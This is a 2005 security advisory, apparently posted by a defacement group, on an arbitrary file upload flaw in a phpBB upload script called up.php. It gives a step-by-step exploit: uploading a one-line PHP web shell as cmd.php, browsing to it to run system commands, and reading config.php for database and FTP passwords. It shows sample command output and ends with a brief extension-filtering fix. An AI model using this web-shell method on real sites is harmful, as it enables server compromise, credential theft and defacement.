|
##################################################################### Advisory #1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: phr4xz@gmail.com - status-x@hackersoft.net $ Date: 7 April 2005 $ Website: http://defacers.com.mx $ Original Advisory: http://www.defacers.com.mx/advisories/2.txt $ Risk: High $ Vendor URL: http://phpbb.com $ Affected Software: phpBB 2.0.x Note: Sorry if it has been posted before ##################################################################### -= Description =- phpBB its a forums system written in php which can support images, polls, private messages and more http://www.phpbb.com --------------------------------------------------------------------------- -= Vulnerabilities =- - | "Arbitrary File Upload" | In phpBB forums there is an script which can allow to remote and registered users to upload files with arbitrary content and with any extension. I didnt found any website where i can download the script so i couldnt check who made it. - | Examples: | We can create and example code to upload it to the "test site" system($cmd) ?> And save it as cmd.php. The we enter to: -------------------------- http://target/phpbb/up.php -------------------------- And upload our code, to see our file we just enter to: ----------------------------------- http://targey/phpbb/uploads/cmd.php ----------------------------------- And we could see that our file has been uploaded: Warning: system(): Cannot execute a blank command in /home/target/public_html/forum/uploads/tetx.php on line 2 The we can execute *NIX commands to obtain extremely compromising info that could end with the "deface" of the affected site: ----------------------------------------------------- Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux /home/target/public_html/forum/uploads uid=32029(target) gid=530(target) groups=530(target) ------------------------------------------------------ This is just an example to what can be done by a malicious attacker. - | "Password Disclosure" | The remote or local attacker can also read the config.php file disclosing the information about the DB and possible the FTP password ------------------------------------------------------ Example -= How to FIX =- Just filter the allowed extensions of the uploaded files in the up.php source. -= Contact =- Status-x phr4xz@gmail.com http://www.defacers.com.mx